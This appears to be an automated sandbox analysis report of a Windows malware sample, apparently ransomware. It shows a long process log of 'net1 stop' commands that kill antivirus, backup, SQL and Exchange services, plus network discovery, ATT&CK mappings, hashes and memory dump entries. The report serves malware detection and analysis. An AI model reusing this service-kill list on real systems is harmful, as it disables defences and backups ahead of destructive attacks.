C:\Windows\system32\net1 stop SMTPSvc /y
1⤵
PID:15948

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_service /y
1⤵
PID:15940

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
1⤵
PID:15932

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
1⤵
PID:15868

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer110 /y
1⤵
PID:15860

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
1⤵
PID:15688

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sacsvr /y
1⤵
PID:15520

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
1⤵
PID:15512

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
1⤵
PID:15504

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
1⤵
PID:15492

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop audioendpointbuilder /y
1⤵
PID:15480

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DCAgent /y
1⤵
PID:15472

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
1⤵
PID:15464

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
1⤵
PID:15456

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
1⤵
PID:15448

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_update_64 /y
1⤵
PID:15436

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
1⤵
PID:15428

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop svcGenericHost /y
1⤵
PID:15420

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMGMT /y
1⤵
PID:15412

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SmcService /y
1⤵
PID:15404

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop UI0Detect /y
1⤵
PID:15396

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
1⤵
PID:15388

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Symantec System Recovery” /y
1⤵
PID:15380

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
1⤵
PID:15372

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msexchangeadtopology /y
1⤵
PID:15364

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CXDB /y
1⤵
PID:12356

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop tmlisten /y
1⤵
PID:9612

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SntpService /y
1⤵
PID:1080

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop vapiendpoint /y
1⤵
PID:7352

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
1⤵
PID:3052

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Antivirus /y
1⤵
PID:5072

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
1⤵
PID:4072

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
1⤵
PID:13812

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop POP3Svc /y
1⤵
PID:3084

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
1⤵
PID:3972

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
1⤵
PID:15356

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
1⤵
PID:15348

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
1⤵
PID:15340

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop W3Svc /y
1⤵
PID:15328

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMTA /y
1⤵
PID:15320

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
1⤵
PID:15312

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
1⤵
PID:15304

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
1⤵
PID:15228

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer /y
1⤵
PID:15220

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
1⤵
PID:15208

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROD /y
1⤵
PID:15200

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPS /y
1⤵
PID:15192

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SamSs /y
1⤵
PID:15184

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
1⤵
PID:15168

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SAVService /y
1⤵
PID:15152

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
1⤵
PID:15144

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ShMonitor /y
1⤵
PID:15132

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Smcinst /y
1⤵
PID:15124

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AVP /y
1⤵
PID:15116

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop WRSVC /y
1⤵
PID:15108

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SAVAdminService /y
1⤵
PID:15100

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
1⤵
PID:15092

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
1⤵
PID:15076

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
1⤵
PID:15060

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
1⤵
PID:15052

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
1⤵
PID:15044

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSA /y
1⤵
PID:15028

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
1⤵
PID:15020

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Clean Service” /y
1⤵
PID:15012

C:\Windows\SysWOW64\net.exe
net view
1⤵
- Discovers systems in the same network
PID:14944

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLSafeOLRService /y
1⤵
PID:14560

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
1⤵
PID:14184

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msftesql$PROD /y
1⤵
PID:14176

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
1⤵
PID:14168

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sms_site_sql_backup /y
1⤵
PID:14160

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
1⤵
PID:14152

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
1⤵
PID:14144

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
1⤵
PID:14136

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
1⤵
PID:14128

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfevtp /y
1⤵
PID:14120

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_update /y
1⤵
PID:14112

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_filter /y
1⤵
PID:14104

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKeyScheduler /y
1⤵
PID:14096

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
1⤵
PID:14080

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
1⤵
PID:14072

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLBrowser /y
1⤵
PID:14064

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
1⤵
PID:14056

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKey /y
1⤵
PID:14048

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
1⤵
PID:14040

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RESvc /y
1⤵
PID:14032

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Health Service” /y
1⤵
PID:14024

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sophossps /y
1⤵
PID:14016

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLSERVERAGENT /y
1⤵
PID:14008

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
1⤵
PID:14000

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS /y
1⤵
PID:13992

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
1⤵
PID:13984

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TmCCSF /y
1⤵
PID:13976

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
1⤵
PID:13912

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Message Router” /y
1⤵
PID:13904

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
1⤵
PID:13848

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
1⤵
PID:13832

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
1⤵
PID:13820

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROD /y
1⤵
PID:13732

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SstpSvc /y
1⤵
PID:13724

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
1⤵
PID:13716

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
1⤵
PID:13708

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ARSM /y
1⤵
PID:13564

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
1⤵
PID:13324

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
1⤵
PID:2640

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Client” /y
1⤵
PID:9932

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
1⤵
PID:4260

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
1⤵
PID:4476

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
1⤵
PID:4796

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
1⤵
PID:9756

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCatalogSvc /y
1⤵
PID:8528

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCloudSvc /y
1⤵
PID:4624

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop OracleClientCache80 /y
1⤵
PID:2392

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
1⤵
PID:8832

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSRS /y
1⤵
PID:13136

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “aphidmonitorservice” /y
1⤵
PID:13124

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EhttpSrv /y
1⤵
PID:13092

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeES /y
1⤵
PID:13084

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer /y
1⤵
PID:13076

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EPSecurityService /y
1⤵
PID:13068

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
1⤵
PID:13060

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ntrtscan /y
1⤵
PID:13052

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploySvc /y
1⤵
PID:13044

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
1⤵
PID:13036

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EsgShKernel /y
1⤵
PID:13028

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McShield /y
1⤵
PID:13020

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
1⤵
PID:13012

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop IISAdmin /y
1⤵
PID:13004

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper /y
1⤵
PID:12996

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
1⤵
PID:12988

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
1⤵
PID:12980

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
1⤵
PID:12972

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer100 /y
1⤵
PID:12964

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ESHASRV /y
1⤵
PID:12956

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
1⤵
PID:12948

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
1⤵
PID:12940

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
1⤵
PID:12932

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamRESTSvc /y
1⤵
PID:12924

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
1⤵
PID:12884

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EPUpdateService /y
1⤵
PID:12868

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
1⤵
PID:12824

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
1⤵
PID:12816

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamMountSvc /y
1⤵
PID:12808

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
1⤵
PID:12800

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EraserSvc11710 /y
1⤵
PID:12792

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McTaskManager /y
1⤵
PID:12772

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQL Backups /y
1⤵
PID:12764

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLSERVER /y
1⤵
PID:12756

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfefire /y
1⤵
PID:12748

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfemms /y
1⤵
PID:12740

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
1⤵
PID:12732

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
1⤵
PID:12724

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ekrn /y
1⤵
PID:12716

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
1⤵
PID:12708

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop FA_Scheduler /y
1⤵
PID:12700

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mozyprobackup /y
1⤵
PID:12692

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MMS /y
1⤵
PID:12684

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
1⤵
PID:12676

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SDRSVC /y
1⤵
PID:12668

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
1⤵
PID:12660

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
1⤵
PID:12652

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPS /y
1⤵
PID:12556

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
1⤵
PID:12300

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeFramework /y
1⤵
PID:12292

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop masvc /y
1⤵
PID:10188

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
1⤵
PID:8584

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
1⤵
PID:8472

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MBAMService /y
1⤵
PID:9368

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MySQL57 /y
1⤵
PID:7548

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeEngineService /y
1⤵
PID:8760

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
1⤵
PID:672

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MBEndpointAgent /y
1⤵
PID:4448

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
1⤵
PID:1440

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Enterprise Client Service” /y
1⤵
PID:9724

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
1⤵
PID:9876

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Agent” /y
1⤵
PID:9964

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPS /y
1⤵
PID:9884

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBrokerSvc /y
1⤵
PID:10124

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
1⤵
PID:9788

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBackupSvc /y
1⤵
PID:10164

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
1⤵
PID:8568

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop KAVFS /y
1⤵
PID:8536

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop KAVFSGT /y
1⤵
PID:12268

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop kavfsslp /y
1⤵
PID:11828

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MySQL80 /y
1⤵
PID:11820

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
1⤵
PID:11812

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
1⤵
PID:11804

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
1⤵
PID:11796

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
1⤵
PID:11788

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop veeam /y
1⤵
PID:11780

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
1⤵
PID:11772

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
1⤵
PID:1240

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
1⤵
PID:2344

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
1⤵
PID:4900

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start FDResPub /y
1⤵
PID:4568

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s upnphost
1⤵
PID:4524

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfewc /y
1⤵
PID:212

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:3612

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

File Permissions Modification

T1222

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
1c19c16e21c97ed42d5beabc93391fc5

SHA1
8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

SHA256
1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

SHA512
7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
8cab3cfe523cfa7edc7da9a5e8f73a3f

SHA1
9a9152f672af4795ed57096e61e2cfc6ce895063

SHA256
55ecfdf592c3b20aa275dc8e7a61e41f0101260f8f70cf1520fabaa34ae4072a

SHA512
504f78690ce311153f4caf60a599d3a9f8892e0b34b9d50530167788e9839d537cffaf21c69fbc97c8dfa4782008ebfde1acb47eb44fec1904193cca65589eb9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
2ef8a2426616b201963872462ee7fbfc

SHA1
cdc7af1477d2f6d4db26837af14609398b319226

SHA256
39eeba4114c013b441db929cc72123451a0e1ab5e537e6479d531ddddc3e2e67

SHA512
6240c8388b7cdc81b239b520553af14dbee7dadb4ed45ccbf71cf8612833c0b8baf254965b8927d7400163bc65dd7887afd625d671f4f71845dd64dfc0f13219

Download Submit
C:\Users\Admin\AppData\Local\Programs\Temp\wqm58yk7.exe
MD5
48ea3794091a9f17e12f5c1a90e1f7d7

SHA1
1bb17eef59764e84f95b7a5c0aad649b8517ee43

SHA256
dcd725c415cebc7df170edf49af18d6f86e76ef75185737de5959405f4aecc56

SHA512
0355be6a2b2cf58d4ca5b11de5f84803240587937cd28d064df20ac38c945352e14c78e21006824114f67ede71be3ab27cc27b05759fc23a1fb8dcfa31a7244f

Download Submit
C:\Users\Admin\AppData\Local\Programs\Temp\wqm58yk7.exe
MD5
48ea3794091a9f17e12f5c1a90e1f7d7

SHA1
1bb17eef59764e84f95b7a5c0aad649b8517ee43

SHA256
dcd725c415cebc7df170edf49af18d6f86e76ef75185737de5959405f4aecc56

SHA512
0355be6a2b2cf58d4ca5b11de5f84803240587937cd28d064df20ac38c945352e14c78e21006824114f67ede71be3ab27cc27b05759fc23a1fb8dcfa31a7244f

Download Submit
C:\wCmfmRe\dtwzrQf\GZTJoxx.exe
MD5
19f207b20b1d2a05aba1a1eb59da54d2

SHA1
8d75108ec34fd79f8336041d5ff31443cc527add

SHA256
8e775324fc69a677394cf6d079d1d45bf53af10acd683bda53e5f86a8a192393

SHA512
6a6b97e5f4543437270628af70a67e51a32d1ad9afbc0f19611d0131d9e84154f8525e3aeeb41c82f1c4437694be898b7ef520ac8eddf9b227f3d1013e57f749

Download Submit
C:\wCmfmRe\dtwzrQf\GZTJoxx.exe
MD5
19f207b20b1d2a05aba1a1eb59da54d2

SHA1
8d75108ec34fd79f8336041d5ff31443cc527add

SHA256
8e775324fc69a677394cf6d079d1d45bf53af10acd683bda53e5f86a8a192393

SHA512
6a6b97e5f4543437270628af70a67e51a32d1ad9afbc0f19611d0131d9e84154f8525e3aeeb41c82f1c4437694be898b7ef520ac8eddf9b227f3d1013e57f749

Download Submit
memory/200-54-0x0000000000000000-mapping.dmp

Download
memory/212-82-0x0000000000000000-mapping.dmp

Download
memory/220-53-0x0000000000000000-mapping.dmp

Download
memory/532-71-0x0000000000000000-mapping.dmp

Download
memory/584-73-0x0000000000000000-mapping.dmp

Download
memory/640-23-0x0000000007222000-0x0000000007223000-memory.dmp

Filesize
4KB

Download
memory/640-29-0x0000000008900000-0x0000000008901000-memory.dmp

Filesize
4KB

Download
memory/640-46-0x00000000072A0000-0x00000000072A1000-memory.dmp

Filesize
4KB

Download
memory/640-18-0x0000000000000000-mapping.dmp

Download
memory/640-19-0x0000000073120000-0x000000007380E000-memory.dmp

Filesize
6.9MB

Download
memory/640-20-0x0000000004BF0000-0x0000000004BF1000-memory.dmp

Filesize
4KB

Download
memory/640-21-0x0000000007860000-0x0000000007861000-memory.dmp

Filesize
4KB

Download
memory/640-22-0x0000000007220000-0x0000000007221000-memory.dmp

Filesize
4KB

Download
memory/640-44-0x00000000072B0000-0x00000000072B1000-memory.dmp

Filesize
4KB

Download
memory/640-24-0x0000000007640000-0x0000000007641000-memory.dmp

Filesize
4KB

Download
memory/640-25-0x00000000076E0000-0x00000000076E1000-memory.dmp

Filesize
4KB

Download
memory/640-27-0x0000000008000000-0x0000000008001000-memory.dmp

Filesize
4KB

Download
memory/640-28-0x0000000007820000-0x0000000007821000-memory.dmp

Filesize
4KB

Download
memory/640-42-0x000000007F100000-0x000000007F101000-memory.dmp

Filesize
4KB

Download
memory/640-30-0x00000000086E0000-0x00000000086E1000-memory.dmp

Filesize
4KB

Download
memory/640-32-0x00000000096C0000-0x00000000096F3000-memory.dmp

Filesize
204KB

Download
memory/640-39-0x00000000096A0000-0x00000000096A1000-memory.dmp

Filesize
4KB

Download
memory/640-40-0x00000000097F0000-0x00000000097F1000-memory.dmp

Filesize
4KB

Download
memory/640-41-0x00000000099B0000-0x00000000099B1000-memory.dmp

Filesize
4KB

Download
memory/640-43-0x0000000007223000-0x0000000007224000-memory.dmp

Filesize
4KB

Download
memory/892-81-0x0000000000000000-mapping.dmp

Download
memory/1008-88-0x0000000000000000-mapping.dmp

Download
memory/1100-101-0x0000000000000000-mapping.dmp

Download
memory/1144-79-0x0000000000000000-mapping.dmp

Download
memory/1164-74-0x0000000000000000-mapping.dmp

Download
memory/1296-100-0x0000000000000000-mapping.dmp

Download
memory/1392-77-0x0000000000000000-mapping.dmp

Download
memory/1496-58-0x0000000000000000-mapping.dmp

Download
memory/1500-126-0x00000000088A0000-0x00000000088A1000-memory.dmp

Filesize
4KB

Download
memory/1500-113-0x0000000006FC0000-0x0000000006FC1000-memory.dmp

Filesize
4KB

Download
memory/1500-148-0x0000000006FC3000-0x0000000006FC4000-memory.dmp

Filesize
4KB

Download
memory/1500-142-0x0000000009930000-0x0000000009931000-memory.dmp

Filesize
4KB

Download
memory/1500-119-0x0000000007E00000-0x0000000007E01000-memory.dmp

Filesize
4KB

Download
